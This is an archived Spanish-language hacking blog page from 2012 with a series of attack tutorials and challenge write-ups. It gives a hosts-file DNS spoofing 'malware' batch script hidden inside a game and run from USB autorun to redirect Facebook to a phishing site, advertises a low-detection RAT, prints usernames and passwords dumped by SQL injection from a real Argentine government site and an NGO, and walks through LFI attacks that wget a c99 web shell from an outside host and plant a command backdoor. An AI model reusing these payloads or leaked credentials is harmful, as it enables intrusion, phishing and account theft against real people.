2012 ~ HD_Breaker Seguridad Informatica

Ethical Hacking And Exploits Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Wargames Challenges and Solutions

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Python App Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Java Development Tools

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Android App Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

martes, 16 de octubre de 2012

Reto Genera Tu Exploit

Hace Tiempo q no codeaba un Reto y este me Parecio Apropiado, toda Persona q se Concidere Pentester Sabe la importancia de este tema. Asi q los Reto a Generar Su PROPIO EXPLOIT!!! para mi pequeña Aplicacion.


Que es un Exploit?



Exploit (del inglés to exploit, explotar o aprovechar) es crear una pieza de software, o una secuencia de comandos con el fin de causar un error o un fallo en alguna aplicación, a fin de causar un comportamiento no deseado o imprevisto en este y lograr ejecutar codigo Arbitrario. Lo Cual el Programa Original no Estaba Destinado a Lograr.

Aca el Link de la Aplicacion:

http://www.filefactory.com/file/cg2sq7ux2jv/n/RetoExploit.rar

Un Pantallazo para que vean q es vulnerable:



No den Pistas, y por favor no Publiquen la Solucion hasta q de por Concluido el Reto.

Espero que les Sea Entretenido a Todos mis Lectores

Offensive Security-Pentest en Entorno Real

Un video De Una Intrusion Real Realizada por la Gente de Offensive Security explicando como lo Lograron Creditos a [Q]rv[O]

http://vimeo.com/22243721

Dejo el Link al Video.

Mailer PHP con soporte HTML

Bueno aca les traigo un pequeño Mailer HTML y Mail Bomber hecho en php (ademas registra las ips que visitan la web), si el servidor smtp esta bien configurado este funcionara a la perfeccion, tambien manda a listas de mails, si de separan los emails por coma.

Source:

http://www.filefactory.com/file/w0w3uyxf3vx/n/HDMailer.zip

Captura:

martes, 4 de septiembre de 2012

BlackBuntu & Backtrack!

Hoy me encontre con un problema muy grande entre mi notebook y mi Backtrack 5 R3.

Este Ultimo Entraba en Conflictos con mi placa de video Intel HD, por lo q cada Tanto Crasheaba Gnome y me cerraba todo Proyecto q no habia guardado, ante este inconveniente decidi volver a mi viejo pero muy confliable Blackbuntu ce 0.3, este aunq con menos Herramientas que Backtrack es un muy confiable y potente Distribucion de Pentest.

Una vez dentro de el, me encontre con la incopatibilidad entre mi placa wifi Broadcom BCM4313 y Blackbuntu y un problema de drivers entre mi touchpad vertical scroll, despues de horas de intentos fallidos encontre una solucion que me parecio muy importante compartir para resolver este fallo, la clave esta en Actualizar el Kernel a la version 3.4 o superior, para lograr esto seguir los siguientes pasos:



1) Ir hacia la zona de Descarga: http://kernel.ubuntu.com/~kernel-ppa/mainline/
2) Entrar en la Carpeta del Kernel deseado en mi caso 3.4.0 (precise)
3) Descargar los siguientes paketes:
                                                        linux-headers___all.deb
                                                        linux-headers___amd64.deb
                                                        linux-image___amd64.deb
4) Instalar los paquetes en el mismo Orden de Descarga del Punto 3.
5) Actualizar Grub2: En un terminal colocar sudo update-grub
6) Reiniciar.

Luego de esto me digne a reiniciar mi pc al iniciar sorpresivamente para mi el Wifi empeso a funcionar a la Perfeccion y ya no tenia problemas con el scroll, ahora sin Problemas en Gnome, sin Problemas con el Wifi y sin Problemas con el TouchPad me voy directo a Solucionar el Problema de las Herramientas Agregando a Blackbuntu los Repositorios Oficiales de Backtrack.

Abrimos el terminal: sudo gedit /etc/apt/sources.list
Copiamos al final de todo:

#####BACKTRACK 5R3 REPOSITORIOS######
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Guardamos y Cerramos.

En el Terminal Colocamos:

sudo wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

Luego:

sudo add-apt-repository ppa:tualatrix/ppa
sudo apt-get update

Despues de Esto Solo queda Abrir Synaptic y instalar las herramientas que deseamos y no posea nuestro Blackbuntu.

jueves, 23 de agosto de 2012

Segundo Crackme Java Keygening

http://www.filefactory.com/file/11qg8hrti5jj/n/CrackMe2.jar

Pequeño Crackme donde tenemos q generar un serial a base de un "Usuario"

martes, 21 de agosto de 2012

Crackme Java

Bastante Facil espero q sea del agrado de los Lectores:

http://www.filefactory.com/file/1dwtw3qemo55/n/CrackMe.jar

martes, 7 de agosto de 2012

Dns Spoof Modificando Archivo hosts con "Malware"


DNS Spoofing Malware


Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash

El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro


Primer Caso:

Ingenieria Social.

Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)


@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit


En mi caso direccionare facebook.com a un sitio Fake (Phishing)

DNSSPOOF.bat:

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit

Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.



Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)

Agregamos los 2 Archivos:



aca la parte importante.


Install Program: Pondremos Packman.exe

Post Intall Command: Pondremos DNSSPOOF.bat



En Show Windows ponemos Hidden

En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User

y lo Guardamos con el Nombre Packman2.exe

En Configure Restart ponemos NO RESTART

Esperamos q Termine la Comprecion

Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)



Ahora ejecutamos para la prueba:



vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.



borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas :)

Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.

Segundo caso:

Ejecutando Archivo desde un PenDrive:

crearemos un archivo autorun.inf que contenga:

[autorun] 

action=Open Files On Folder
icon=USB.ico

shellexecute=Start.vbs

y un Start.vbs que contenga:

set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide

Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive



Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts

Veamos como funciona:

Visitamos facebook.com luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a www.facebook.com (que realmente es un sitio Phishing)
Agregamos de Informacion User: pepe@hotmail.com pass: Owned



y le damos Entrar, nos redirecciona a www.facebook.com (sitio real de facebook)

vamos a nuestro servidor y revisamos el archivo log.txt



Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker

viernes, 27 de julio de 2012

BasicRat by HD_Breaker

Les Traigo una Herramienta Que Arme en estos Dias,
Es un Rat bien Basico, en VB6 no es multithread (no he tenido tiempo de modificarlo),
tampoco tiene incluido el Builder exe,
La Shell no responde a cd ni a comandos q requieran respuesta (luego del comando debera pasarse el comando 1 para obtener la respuesta)
El filemanager no esta incluido, preferi hacerlo funcionar con un servidor tftp (tftp -i "ip/host" GET "Archivo") para luego ejecutarlo desde la shell
(en esta parte se pueden armar varios scripts para obtener informacion sensible guardarla en un log y por medio de tftp PUT obtener el Contenido de estos)
No se Adhiere al Registro (esta funcion la pondre en unos dias cuando termine de Rendir, igual cualquiera de esta seccion sabra agregarle funciones a este proyecto)

El Fin de este RAT era mantener la simpleza para reducir la cantidad de AVs que detectan el Server
Todo Nacio a base de Un Proyecto para la Universidad, a esto le falta mucho desarrollo
pero la meta era realizar algo simple y poderoso con baja deteccion y en lenguaje VB6


Prometo Mejorarlo y Codearlo en Otro Lenguaje.

Adjunto Los Proyectos (Source y Binario)

http://www.filefactory.com/file/5rlj3lf28b63/n/BasicRat.rar

Test.exe esta sobre 127.0.0.1 para prueba local,
Para Hacerlo Funcional fuera del entorno local, cambien el ip por su NO-IP y abran los puertos 9669, 6666 y 9999
C:\Windows\System32 puede variar depende de la pc
pueden usar las variables de entorno para setear eso al momento de escribir los logs. (%SystemDrive%\System32\)

Todo Aquel que desee Modificarlo sientace libre de hacerlo.

Capturas:


Un escaneo Rapido Bajo NoVirusThank

File Info

Report date: 2012-07-27 09:57:10 (GMT 1)
File name: test-exe
File size: 28672 bytes
MD5 Hash: aa55baf750fef5167f0bb79cdc1000c0
SHA1 Hash: b8a248d1105ef47e1edd4872ace31b08da2973f0
Detection rate: 1 on 14 (7%)
Status: INFECTED


Detections

Asquared -
Avast -
AVG -
Avira -
BitDefender - Gen:Trojan.Heur.bm0@fr!oGDJ
ClamAV -
Comodo -
DrWeb -
Fprot -
IkarusT3 -
Panda -
STOPZilla -
TrendMicro -
VBA32 -

Scan Date: 2012-07-27
File Name: Test.exe
File Size: 36864 bytes
MD5 Hash: aa55baf750fef5167f0bb79cdc1000c0
SHA1 Hash: b8a248d1105ef47e1edd4872ace31b08da2973f0
Status: INFECTED
Total Result: 7/37
AVG: Clean
Acavir: Clean
Avast 5: Clean
Avast: Clean
Avira: TR/Dropper.Gen
BitDefender: Clean
VirusBuster Internet Security: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
DrWeb: Clean
eTrust-Vet: Win32/VBNA.A!generic
F-PROT Antivirus: Clean
F-Secure Internet Security: Trojan.Generic.KDV.554434
G Data: Trojan.Generic.KDV.554434
IKARUS Security: Clean
Kaspersky Antivirus: Trojan-PSW.Win32.Ruftar.nwc
McAfee: Clean
MS Security Essentials: Clean
ESET NOD32: Clean
Norman: Clean
Norton: Clean
Panda Security: Clean
A-Squared Security: Clean
Quick Heal Antivirus: Clean
Rising Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Vexira Antivirus: Clean
Webroot Internet Security: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
AhnLab V3 Internet Security: Clean
Bullguard: virus: Trojan.Generic.KDV.554434
Imunitet: Trojan.Generic.KDV.554434
Vipre: Clean

jueves, 19 de julio de 2012

Blind SQLI en el Gobierno de Salta, Republica Argentina


SQLI en el Gobierno de Salta, Republica Argentina

http://www.salta.gov.ar/video-salta.php?IdVideo=15


[*] information_schema
[*] salta


| tageestado            
| tagefuncionarios      
| tagenda                
| tbanbanners            
| tcoberturaprensa      
| tconcontenidos        
| tencdetalles          
| tencpreguntas          
| tencrespuestas        
| tgaleriafotos          
| tgaleriafotosdet      
| tgaleriavideos        
| tnotcategorias        
| tnotnoticias          
| tnotpartesprensafiles  
| tnotrelacionadas      
| tnotsubcategoria      
| tnottipoparteprensa    
| tseguserlevelpermissions
| tseguserlevels        
| tsegusuarios          
| tsisimportar          
| ttvvivo                



 sUsuarioNick       sUsuarioNombre             sUsuarioPass

 luciam                  Lucia Mallozzi                Prensa13    
 emilces                 Emilce Simo                    paginaweb13  
 maudiovisuales    Medios Audiovisuales     JB@rbatt!4  
 jbarbatti               Jorge Barbatti                   barbattiprensa
 rtorres                  Prensa - Torres                 Rto556      
 aguaymas            Prensa - Guaymas            aGUA123      
 antoniotita           Antonio Tita                     Ant0-/*      
 asapia                  Prensa - Ana Sapia          sap-20!!    

SQLI en Sociedad Animalista


SQLI en http://www.liberaong.org/cat=1
Sociedad Animalista, Estoy a favor de la Proteccion animal, pero
un sitio de esta naturaleza activista no puede tener este tipo de fallas. Ya Reporte el fallo, espero lo Arreglen

[*] information_schema
[*] liberadba
[*] test


| activistas              
| actualidad          
| admin_accesos    
| admin_actualizaciones
| admin_archivos        
| admin_gruposdecampos  
| admin_imagenes        
| admin_log_sql          
| admin_registrosespeciales
| admin_renombra        
| admin_tablas_config  
| admin_usuarios      
| admin_usuarios_grupos
| admin_usuarios_permisos
| banners                
| campanas            
| campanas_relacionadas
| colores                
| conceptos            
| cyberactivistas      
| denuncias              
| estado_denuncia      
| estado_pedido          
| explotacion          
| fotos                  
| fotos_categoria      
| linea_pedido          
| mail                  
| material              
| material_categoria    
| newsletter            
| newsletter_parrafos  
| notas_relacionadas    
| parrafos              
| pedidos                
| receptores              
| recetas                
| registrados            
| registradosgrupo        
| socios                  
| textos                  
| tienda                  
| tienda_categoria        
| videos                  
| videos_categoria        
| voluntarios            


 Username            Password            Tipo_de_usuario
 admin                  fuey3g                 administrador total      
 leo                       leo333                 administrador de contenidos


martes, 17 de julio de 2012

Subiendo Shell Explotando LFI via php://input




Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via php:input , solo basta con inyectar algunos códigos para obtener la misma.

Que es el LFI? 

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio.


Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

www.sitio-web.com/index.php?page=
www.sitio-web.com/index.php?file=

Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

www.sitio-web.com/index.php?page=/etc/passwd 

Si el sitio web puede leer dicho código, la web quedaría asi:


Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar


Ahora vamos a tratar de poner este método en acción.

Cargamos la url vulnerable al HackBar e inyectamos el php://input la cual quedaría asi:

www.sitio-web.com/index.php?page=php://input

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Ejemplo:


Otros comandos:

Lista de directorios

<? system ('ls'); ?>


Identificación

<? system ('id'); ?>


Convertir el formato

<? system ('mv file.txt file.php'); ?>


Descargar

<? system ('wget'); ?>


Ahora, vamos a utilizar el comando [color=green]<? system ('wget'); ?>[/color] para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: http://r57.biz/c99.txt

<? system ('wget http://r57.biz/c99.txt'); ?>



Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt


Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>



Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php


Ahora, en este caso nos dirigimos a www.sitio-web.com/calebbucker.php y Voila tenemos nuestra shell!!


No Entendistes?

Observa el VideoTutorial en 1080p HD!


Espero te sirva y lo uses con prudencia.

Saludos.

Fuente: http://calebbucker.blogspot.com.ar/2012/07/subiendo-shell-explotando-lfi-via.html

WordPress Security Fingerprinter Exploit-DB



Hola, esta vez les dejare una herramienta para encontrar Plugins Vulnerables en los sitios WordPress, es útil para tareas de Pruebas de Penetración y/o para la diversión y beneficio.

La versión actual cuenta con 240 Pruebas de Seguridad.

Esta versión se publico el 18 de Junio del 2012.

Descargamos la herramienta desde el siguiente link: http://www.sendspace.com/file/8md0eh

Descomprimimos, y ejecutamos al herramienta con el siguiente comando:

root@TioSam:~# cd Desktop
root@TioSam:~/Desktop# cd WordPress
root@TioSam:~/Desktop/WordPress# ls
README  WP
root@TioSam:~/Desktop/WordPress# ./WP http://www.noticiasdehackers.com


En este caso yo he colocado, el link http://www.noticiasdehackers.com/ para poner a prueba la herramienta, como se aprecia en la siguiente imagen:



Como podemos apreciar, la herramienta nos arrojo la Version WordPress del sitio web en este caso es 3.3.1 en la cual tambien nos arroja el exploit para dicha versión.

Mas abajo, nos muestra los módulos vulnerables, en la cual nos muestra con sus exploits respectivos.

Si queres ver el funcionamiento de esta herramienta, observa el siguiente vídeo, en la cual podes colocar la resolución en 1080p para que aprecies mejor el vídeo.



Espero le des buen uso y puedas parchear las vulnerabilidades de algun sitio WordPress.

Saludos.

Fuente: http://calebbucker.blogspot.com.ar/2012/07/wordpress-security-fingerprinter.html

Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdorizar


Leyendo el Post de CalebBuker sobre LFI atrasves de php://input
desidi hacer un tutorial de otro metodo para concegir subir una shell por medio de LFI
utilizando injecciones php atraves de una vulnerabilidad en el /proc/self/environ
Empecemos:

Primero Buscamos con un dork alguna web Vulnerable a LFI

Dork:

inurl:*.php?page=* site:.com.ar

Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido
En este caso:

http://sitiovulnerable/index.php?page=/etc/passwd



Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado

http://sitiovulnerable/index.php?page=/proc/self/environ



Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:

Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web

Atrapa el Primer "paquete" y nos sale el siguiente cartel



Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.



Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:



Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)

Subiremos Nuestra Shell, de la siguiente forma.

Abriremos Tamper Data y comensaremos a Capturar.
Repetiremos la Peticion al host:
http://sitiovulnerable/index.php?page=/proc/self/environ
Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php

<? system('wget http://SitioDeLaShell/shell.txt'); ?>



Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent

<? system('ls'); ?>

Vemos que dentro de la lista de archivos del host aparece nuestra shell



Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent

<? system('mv c99.txt s.php'); ?>

Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:

<? system('ls'); ?>



Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL

http://sitiovulerable/s.php



Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php



Les Dejo el code del backdoor q arme:

<?php
if($_GET['active']=='si'){
system( $_GET['c']);
}
?>

Lo Introduciremos dentro de index.php y al llamarlo desde

http://SutioVulnerable/index.php?c=ls&active=si

nos mostrara el resultado de la ejecucion del parametro q pasemos.



Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor

http://SutioVulnerable/index.php?c=rm s.php&active=si

Listamos el Contenido del Host

http://SutioVulnerable/index.php?c=ls&active=si

y vemos q s.php ha desaparecido.



Espero que este tutorial les halla servido, HD_Breaker

Renuncia: No me hago Responsable del Uso que le den a este tutorial, su contenido es puramente educativo

Solucionario Reto Vulnerar Servidor (Simulación) by HD_Breaker & Dedalo


Bueno Antes que Nada Queremos Agradecer a Todos Los Participantes, y darles Nuestras Felicitaciones A los 5 Usuarios que Lo Completaron con éxito

Empecemos A Solucionar Este Reto Php para Abrir Camino a los Nuevos ;)

1) Entramos a http://retosphp.host22.com/

y nos encontramos con este Imponente Panel de Administración,




por simple curiosidad Testeamos que sucede al logearnos con un usuario inexistente, probemos

Usuario: Test
Contraseña: Test

Y Sorprendentemente Aparece Exactamente la mima Web con nuestros queridos Campos Borrados,
Con la Diferencia q ahora en la la URL se muestra el nombre de la pagina "index.php"



Se nos Ocurre Mirar el Source de esta Web para ver si encontramos algo de Utilidad

Source:

<html>
<body style="background-image:url(a.jpg); background-attachment: fixed; background-position: top center; background-repeat: no-repeat;">
<form action="log.php" method="post">
<center><h4>Ingrese sus datos</h4><br>
USUARIO:<br>
<input type="text" name="user"><br>
CONTRASE&NtildeA:<br>
<input type="text" name="password"><br>
<input type="submit">
</center>
</form>
</html>
<!-- Hosting24 Analytics Code -->
<script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
<!-- End Of Analytics Code -->


Y nos encontramos con la siguiente String

<form action="log.php" method="post">

Esto Dice  que Al Clikear sobre nuestro querido boton Submit, los Parámetros Añadidos en el formulario (Usuario/Contraseña)
pasan como variables de un archivo log.php (lo primero q se me viene a la mente es que este formulario funciona
haciendo una petición sql a la base de datos comparando los datos introducidos con los existente en la BD)

Intentemos Bypassearla, probamos con algunos bypasses comunes en ambos campos como por ej.

x' or 1=1

Nuevamente aparece el molesto cartel de login



Probemos Con otro bypass

' OR '1'='1

De nuevo el formulario de logeo



Antes de Darnos por vencidos probamos con

' OR ''='

y POR UN DESCUIDO DEL PROGRAMADOR WEB, INGRESAMOS A LA PARTE PROHIBIDA Muajajajaja (Risa Siniestra XD)



vemos que nos dice las Palabras Mágicas

"Reto LFI encuentra el config.php"

(Todos Pensamos en nuestros adentros, esto ya no es un simple Bypass Ahora esta Web Mal Programada Me Reta a que le encuentre un LFI)

Investiguemos un poco para saber q es un LFI (Local File Inclution)


Que es el lfi? (esta explicacion no es mía es de n0b0dy de undersecurity.net)

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algún otro archivo de configuracion que nos provea de información para atacar el sitio.

Esta falla se produce en códigos similares a estos:

(pagina_lfi.php)
<?php
$pagina = $_GET['pagina'];
include($pagina);
?>

Aqui podemos ver que el código siguiente recepcionara mediante el método get (es decir se podrá ver mediante la url la variable a inyectar) también es posible que existan lfi mediante el método post pero eso es un poco mas complicado de encontrar; lo que hace este código es incluir una pagina dentro de otra.


Entonces veremos la url mas menos así:
http://server.cl/pagina_lfi.php?pagina=[archivolocalaincluir]



Deducción en nuestras URL se ve algo como esto

http://retosphp.host22.com/include.php?file=img.jpg

y la expoliación muestra algo así:

http://server.cl/pagina_lfi.php?pagina=[archivolocalaincluir]

Comparemos:

http://server.cl/pagina_lfi.php?pagina=[archivolocalaincluir]
http://retosphp.host22.com/include.php?file=img.jpg

Se parecen no es verdad?, Recordemos que en nuestros intentos de logeo y al revisar el Source encontramos 2 nombres de Archivos Importantes

index.php
log.php

Explotemos el LFI como dice la Expoliación, Quedaría Algo como esto:

http://retosphp.host22.com/include.php?file=index.php

y nuestro Programador Desastroso
(Sin animo de Ofender Dedalo es solo para crear ambiente, mis conocimientos en php son básicos y no quiero faltarte el respeto)
nos informa lo siguiente:

"Vas por buen camino debes encontrar el archivo de configuracion busca en otro archivo"

Interesante, Recordemos el archivo que encontramos en el Source (log.php), Repitamos el ataque, ahora incluyendo a log.php

http://retosphp.host22.com/include.php?file=log.php

Y esta nuevamente nos encontramos con información Sensible

"Vas por buen camino debes encontrar el archivo de configuracion busca en el directorio inc"

Recordemos que el reto Principal es encontrar el contenido de config.php, que según nos dice log.php se encuentra en la carpeta inc,

Esto esta mas q faci no? :)

Incluimos esa carpeta (inc) y el archivo config.php

http://retosphp.host22.com/include.php?file=inc/config.php

y nos encontramos con las Palabras Magicas:

aGRicmVha2VyIHkgRGVkYWxvIG1lIGVuc2XxYW4=
Felicidades!!!

Envia la solucion en un texto plano a los Moderadores de la Seccion

Un momento nos dice, en Texto Plano...
Mmmm esa codificacion me es familiar, creo q es Base64.
Probamos Desencriptarla con Base64 Decrypter

y su contenido es:

hdbreaker y Dedalo me enseñan

Anotamos una descripcion de lo q hicimos junto con la contraseña desencriptada y se la mandamos a los Moderadores

Se da Por Concluido Este Solucionario.

Dedalo & HD_Breaker.

Gracias a todos los Participantes. Se Felicita a:

1° pansinotdead

2° 5TU4RT

3° arthusu

4° k43l

* Sanko

PD: Los Links No Funcionan El host Murio

WebShell Mediante LFI y jpg


En este Tutoria Explicare como meter una phpshell dentro de un servidor por medio de un jpg, para explotarlo mediante un LFI.

Empesemos:

1) Necesitamos 3 cosas una shell.php (con el contenido de nuestra webshell preferida),
una imagen q llame la atencion yo elegi sexy.jpg y un archivo shell.txt con la siguiente String

<? copy("http://tuservidor.com/shell.txt","nombreshell.php"); chmod("nombreshell.php",0755); ?>




Como vemos en la imagen tenemos una foto muy llamativa y un archivo shell.txt con la siguiente string

<? copy("http://tuservidor.com/shell.txt","nombreshell.php"); chmod("nombreshell.php",0755); ?>

yo lo configure de la siguiente manera porq es un entorno local.

<? copy("http://192.168.1.1/shell.txt","shell.php"); chmod("shell.php",0755); ?>

Esta String esta en php, hace lo siguiente:
Copia el contenido de shell.txt situada en nusetro servidor dentro de shell.php
(lo crea dentro de servidor vulnerable) y le asigna permisos 755

Abrimos nuestro Terminal y nos situamos en la Carpeta donde tenemos la foto sexy.jpg y shell.txt
y tipeamos:

cat shell.txt >> sexy.jpg



Todo Termina Correctamente, y si hacemos un Cat a sexy.jpg podemos ver el Source Incluido en ella

cat sexy.jpg



Abrimos sexy.jpg y vemos q la imagen abre sin ningun problema



Ahora nos resta subir sexy.jpg a un servidor Vulnerable a LFI e incluir la Imagen para q se ejecute su contenido php.

(Asumo que ya tiene acceso a AdminPanel y existe un Upload en "X" servidor con una Vulnerabilidad LFI)

http://WebVulnerable/LFI.php?Parametro=sexy.jpg



veran que un monton de caracteres raros aparecen en el navegador (estos son los caracteres Internos del jpg)

luego simplemente Visitamos nuestra shell con la url correspondiente

http://WebVulnerable/shell.php



Espero que este Tutorial Les sea de Utilidad

PD: Este metodo Funciona en Redes Lan y en Redes Wan, No me hago Responsable del uso que le den.

HD_Breaker


Solucionario Reto PQS


A pesar de los Problemas q tubismo Dedalo y yo con PQS y las medidas q se han tomado de el,

Tome este Reto como personal, ya q fue dirigido especialmente a mi y a Dedalo, El Primero en Solucionarlo fue Sanko,

El segundo en solucionarlo fue mi persona y explico acá como hacerlo.

Web del reto: http://pqslabs.netai.net/




lo primero q vemos es un login q si analizamos el source un poco, va a si.php, el cual no existe

después notamos un archivo de fondo q se llama fondo.jpg

nos fijamos q ahí en el con view-source:pqslabs.netai.net/foto.jpg
y en el final de su contenido vemos esto:



al probar con helloaqui.txt en la url, no nos devuelve nada, probamos con fondo.jpg



un curioso fondo verde, analicemos de nuevo con view-source (yo en mi caso use wget para descargar fondo.jpg y luego vi su contenido con cat)



al final de su source vemos:

/acc.php

ingresamos a esa url y vemos lo siguiente:



colocamos las palabras mágicas helloaqui (sin extencion)

y nos devuelve el resultado



Se hizo justicia XD

Algunos sabemos mas q otros pero todos estamos acá para Aprender, las faltas de respeto no se toleran
para mi banear a PQS fue excesivo, mi forma de demostrarle q su postura es errónea es resolviendo su propio juego,

Cosa que el no puedo lograr con el creado por Nosotros (Dedalo & HD_Breaker)

Saludos HD_Breaker